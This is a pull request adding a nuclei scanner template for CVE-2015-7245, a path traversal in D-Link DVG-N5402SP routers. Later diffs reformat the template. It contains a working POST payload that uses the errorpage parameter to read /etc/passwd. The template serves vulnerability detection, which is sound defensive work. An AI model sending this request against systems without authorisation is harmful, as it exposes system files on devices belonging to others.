### PR TITLE
Create CVE-2015-7245.yaml

### DIFF
--- a/CVE-2015-7245.yaml
+++ b/CVE-2015-7245.yaml
@@ -1,0 +1,29 @@
+id: CVE-2015-7245
+
+info:
+  name: D-Link DVG-N5402SP - Path Traversal
+  author: 0x_Akoko
+  severity: high
+  tags: cve,cve2015,dlink,lfi
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2015-7245
+    cwe-id: CWE-22
+  description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+  reference:
+    - https://www.cvedetails.com/cve/CVE-2015-7245
+    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+
+requests:
+  - method: POST
+    path:
+      - "{{BaseURL}}/cgibin/webproc"
+
+    body: "getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh"
+
+    matchers:
+      - type: regex
+        regex:
+          - "root:.*:0:0:"
+        part: body

--- a/cves/2015/CVE-2015-7245.yaml
+++ b/cves/2015/CVE-2015-7245.yaml
@@ -4,16 +4,18 @@ info:
   name: D-Link DVG-N5402SP - Path Traversal
   author: 0x_Akoko
   severity: high
-  tags: cve,cve2015,dlink,lfi
+  description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+  reference:
+    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+    - https://www.exploit-db.com/exploits/39409/
+    - https://www.cvedetails.com/cve/CVE-2015-7245
+    - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2015-7245
     cwe-id: CWE-22
-  description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
-  reference:
-    - https://www.cvedetails.com/cve/CVE-2015-7245
-    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
+  tags: cve,cve2015,dlink,lfi
 
 requests:
   - method: POST

--- a/cves/2015/CVE-2015-7245.yaml
+++ b/cves/2015/CVE-2015-7245.yaml
@@ -4,28 +4,26 @@ info:
   name: D-Link DVG-N5402SP - Path Traversal
   author: 0x_Akoko
   severity: high
-  description: Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
+  description: |
+    Directory traversal vulnerability in D-Link DVG-N5402SP with firmware W1000CN-00, W1000CN-03, or W2000EN-00 allows remote attackers to read sensitive information via a .. (dot dot) in the errorpage parameter.
   reference:
     - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
     - https://www.exploit-db.com/exploits/39409/
-    - https://www.cvedetails.com/cve/CVE-2015-7245
     - https://nvd.nist.gov/vuln/detail/CVE-2015-7245
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
-    cvss-score: 7.5
     cve-id: CVE-2015-7245
-    cwe-id: CWE-22
   tags: cve,cve2015,dlink,lfi
 
 requests:
-  - method: POST
-    path:
-      - "{{BaseURL}}/cgibin/webproc"
+  - raw:
+      - |
+        POST /cgibin/webproc HTTP/1.1
+        Host: {{Hostname}}
 
-    body: "getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh"
+        getpage=html%2Findex.html&*errorpage*=../../../../../../../../../../../etc/passwd&var%3Amenu=setup&var%3Apage=connected&var%&objaction=auth&%3Ausername=blah&%3Apassword=blah&%3Aaction=login&%3Asessionid=abcdefgh
 
     matchers:
       - type: regex
+        part: body
         regex:
           - "root:.*:0:0:"
-        part: body


### PR DESCRIPTION
### Template / PR Information

### The attack may be launched remotely. No form of authentication is required for exploitation.

Vendor : https://www.dlink.com/
- Reference:
    - https://www.cvedetails.com/cve/CVE-2015-7245
    - https://packetstormsecurity.com/files/135590/D-Link-DVG-N5402SP-Path-Traversal-Information-Disclosure.html
    - https://vuldb.com/?id.100526

### Template Validation

I've validated this template locally?
- [x] YES
- [ ] NO


#### Additional Details (leave it blank if not applicable)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)